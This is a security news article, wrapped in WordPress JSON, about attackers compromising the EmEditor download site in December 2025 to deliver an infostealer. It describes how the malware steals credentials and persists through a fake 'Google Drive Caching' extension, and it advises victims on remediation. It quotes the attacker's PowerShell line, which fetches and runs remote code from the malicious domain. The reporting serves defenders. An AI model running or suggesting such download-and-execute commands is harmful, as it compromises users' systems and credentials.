{"id":9546,"date":"2025-12-30T10:03:45","date_gmt":"2025-12-30T10:03:45","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/12\/30\/emeditor-editor-website-hacked-to-deliver-infostealer-malware-in-supply-chain-attack\/"},"modified":"2025-12-30T10:03:45","modified_gmt":"2025-12-30T10:03:45","slug":"emeditor-editor-website-hacked-to-deliver-infostealer-malware-in-supply-chain-attack","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/12\/30\/emeditor-editor-website-hacked-to-deliver-infostealer-malware-in-supply-chain-attack\/","title":{"rendered":"EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack"},"content":{"rendered":"<p>    EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A major supply chain attack targeting EmEditor, a widely used text editor software, has exposed millions of users to sophisticated infostealer malware. <\/p>\n<p>Between December 19 and December 22, 2025, the official EmEditor website fell victim to unauthorized modification, serving compromised installer files to unsuspecting users during a critical four-day window. <\/p>\n<p>The company confirmed that users who downloaded version 25.4.3 through the Download Now button received malicious files instead of legitimate software, creating a significant <a href=\"https:\/\/cybersecuritynews.com\/mailchimp-security-breach\/\" target=\"_blank\" rel=\"noreferrer noopener\">security breach<\/a> affecting developers, system administrators, and technical professionals worldwide.<\/p>\n<p>The attack exploited the redirect mechanism controlling EmEditor\u2019s download pathway. Attackers altered the URL settings that normally directed users to legitimate installation files, instead pointing them to a malicious version hosted on EmEditor\u2019s WordPress content directory. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPu15hxE7E1DO-XSO08mG1zEVRkUtCjSERBINEh4E1c1gcUiRPY9D85keXemg-93my9zsHc5gxDL8KrgNrzBwyf2KxEgbouIXF78G3zprT0rbgIBBoRSSQqPmEOJIACxJvE2uGvsK5ioYwB83JZdwM9eARAAtB0r_2e6mIN5AUiA0dDhQ1lXHiA3Fr2UE\/s16000\/EmEditor%2520Editor%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\" alt=\"EmEditor Editor (Source - Qianxin)\"><figcaption class=\"wp-element-caption\">EmEditor Editor (Source \u2013 Qianxin)<\/figcaption><\/figure>\n<\/div>\n<p>The compromised installer was digitally signed by \u201cWALSHAM INVESTMENTS LIMITED,\u201d a non-official organization, rather than Emurasoft Inc., the software\u2019s legitimate creator. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhX2WjvjtQ5l2PkGPtR9UYRUB13pJT4toodqqEEilyx069RrrWUivjnx64EH8g31XBrGfM9xOIQecVv87UP_39QXBE-vP90F-cl7DB_ulqlZbqyWtNN6a7zNY95m9rT2B20IlAk-_qYDLQTINdbqwPnRsG0Vwn9VCYYof9xe3tGmOBZinbjocxHXOUZVQs\/s16000\/PowerShell%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\" alt=\"PowerShell (Source - Qianxin)\"><figcaption class=\"wp-element-caption\">PowerShell (Source \u2013 Qianxin)<\/figcaption><\/figure>\n<\/div>\n<p>This spoofed signature added a deceptive layer of authenticity that many users might not have questioned.<\/p>\n<p>Qianxin analysts <a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/emeditor-supply-chain-incident-details-disclosed-en\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the malware after careful forensic examination, revealing a comprehensive information-stealing payload embedded within the installation package. <\/p>\n<p>The malicious code demonstrated a sophisticated design that mirrors legitimate EmEditor functionality, allowing it to operate silently during and after installation while collecting sensitive user data.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism\"><strong>Infection mechanism<\/strong><\/h2>\n<p>The malware\u2019s infection mechanism operates through an embedded VBScript that executes a PowerShell command: powershell.exe \u201cirm emeditorjp.com | iex\u201d. <\/p>\n<p>This command downloads and immediately executes additional malicious code directly in system memory, bypassing traditional file-based detection methods. <\/p>\n<p>The payload steals credentials from <a href=\"https:\/\/cybersecuritynews.com\/linux-web-browsers\/\" target=\"_blank\" rel=\"noreferrer noopener\">web browsers<\/a>, including Chrome, Edge, Brave, and Opera, capturing cookies, login data, and browsing history. <\/p>\n<p>It also targets credentials from productivity applications such as Discord, Slack, Zoom, Microsoft Teams, WinSCP, and PuTTY, creating a severe risk for enterprise users managing sensitive communications and infrastructure access.<\/p>\n<p>The <a href=\"https:\/\/cybersecuritynews.com\/chatgpt-powered-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> employs persistence tactics through a malicious browser extension named \u201cGoogle Drive Caching,\u201d which maintains unauthorized access even after the initial infection. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjiKM1KZTeX8KVFfx30xHkOQ5H3yAlYxNM0lcgYXd9h1dRViBaW41jxBnEYRw1iMI2qOmmBZknW1bZdsDuwo515mydtR5g8unRiMGDf5EVpaHIYJc-nQuplyp7594dTBsLJIGsAa4xRlsCy3Fa4sYCSpFdbkWblLBa2HhEwueb4vTHvco0ry6AypxvI2Y0\/s16000\/Google%2520Drive%2520Caching%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\" alt=\"Google Drive Caching (Source - Qianxin)\"><figcaption class=\"wp-element-caption\">Google Drive Caching (Source \u2013 Qianxin)<\/figcaption><\/figure>\n<\/div>\n<p>This extension contains Domain Generation Algorithm capabilities, allowing the attackers to establish resilient command-and-control communications across multiple dynamically generated domains. <\/p>\n<p>The extension can steal <a href=\"https:\/\/cybersecuritynews.com\/facebooks-in-app-browser\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook advertising<\/a> account credentials, monitor clipboard activities for cryptocurrency address replacement attacks, and execute remote commands to extract additional data or manipulate browser behavior. <\/p>\n<p>Victims are advised to disconnect affected systems immediately, perform comprehensive malware scans, and reset all credentials used on compromised devices.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/emeditor-editor-website-hacked\/\">EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/emeditor-editor-website-hacked\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack A major supply chain attack targeting EmEditor, a widely used text editor software, has exposed millions of users to sophisticated infostealer malware. Between December 19 and December 22, 2025, the official EmEditor website fell victim to unauthorized modification, serving compromised installer files to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-9546","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9546"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=9546"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9546\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=9546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=9546"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=9546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}